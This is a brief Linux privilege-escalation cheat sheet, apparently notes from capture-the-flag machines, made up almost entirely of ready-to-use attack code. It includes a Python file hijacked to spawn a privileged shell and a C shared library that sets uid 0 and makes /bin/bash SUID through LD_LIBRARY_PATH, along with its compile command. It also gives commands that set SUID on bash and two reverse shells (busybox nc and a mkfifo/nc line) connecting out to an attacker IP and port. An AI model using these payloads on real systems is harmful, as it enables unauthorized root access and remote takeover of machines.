Python

www-data@walla:/home/walter$ cat << wook > wificontroller.py
> import os;
> os.system("/bin/bash -p");
> wook

C

Sybaris - Crontab + LD_LIBRARY_PATH

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setgid(0);
	setuid(0);
	system("chmod +s /bin/bash");
}
-----------------------------------------------------------------------------------
# compile
gcc -o utils.so -shared -fPIC utils.c

busybox

busybox nc $IP [port] -e /bin/bash

Exploiting Cronjobs or SUID

#1)
cp /bin/bash /tmp/bash & chmod +s /tmp/bash

#2)
chmod u+s /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4444 > /tmp/f